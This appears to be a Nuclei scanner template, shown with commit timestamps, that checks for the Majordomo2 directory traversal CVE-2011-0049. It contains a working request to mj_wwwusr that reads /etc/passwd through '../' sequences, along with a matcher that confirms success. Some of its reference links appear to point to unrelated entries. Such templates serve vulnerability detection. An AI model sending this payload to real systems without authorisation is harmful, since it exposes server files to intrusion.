2021-04-18 10:16:06 +00:00
id : CVE-2011-0049
info :
2021-04-18 14:39:39 +00:00
name : Majordomo2 - SMTP/HTTP Directory Traversal
2021-04-18 10:16:06 +00:00
author : pikpikcu
severity : high
2022-02-21 18:33:16 +00:00
description : A directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface.
2021-08-18 11:37:49 +00:00
reference :
2021-04-18 10:16:06 +00:00
- https://www.exploit-db.com/exploits/16103
- https://nvd.nist.gov/vuln/detail/CVE-2011-0063
2021-04-22 08:59:05 +00:00
- http://www.kb.cert.org/vuls/id/363726
2022-05-17 09:18:12 +00:00
- https://bug628064.bugzilla.mozilla.org/attachment.cgi?id=506481
remediation : Upgrade to a supported version.
2022-02-21 18:33:16 +00:00
classification :
cve-id : CVE-2011-0049
2022-04-22 10:38:41 +00:00
tags : cve,cve2011,majordomo2,lfi
2021-04-18 10:16:06 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-04-18 10:16:06 +00:00
condition : and
- type : status
status :
- 200
2022-02-21 18:33:16 +00:00
# Enhanced by mp on 2022/02/18